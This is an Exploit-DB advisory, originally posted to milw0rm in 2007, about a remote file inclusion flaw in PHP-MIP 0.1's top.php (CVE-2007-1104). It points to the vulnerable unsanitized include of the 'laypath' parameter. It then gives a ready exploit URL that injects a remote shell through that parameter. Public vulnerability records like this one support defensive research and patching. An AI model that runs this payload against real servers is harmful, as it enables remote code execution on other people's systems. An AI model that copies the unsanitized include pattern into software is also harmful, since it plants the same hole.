PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-02-24
date_updated: 2016-09-27
verified: 1
codes: OSVDB-36881;CVE-2007-1104
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpmip-base-0.00.01.tar.gz
*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/ ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali] && Contact: HackEr_@W.Cn ^
**********************************************************************
**********************************************************************
In: /[path]/top.php ^
**********************************************************************
**********************************************************************
Vulnerable Code: ^
**********************************************************************
**********************************************************************
include("$laypath/body.php"); Line : 23 ^
**********************************************************************
**********************************************************************
Exploit: ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell] ^
**********************************************************************
**********************************************************************
# milw0rm.com [2007-02-25]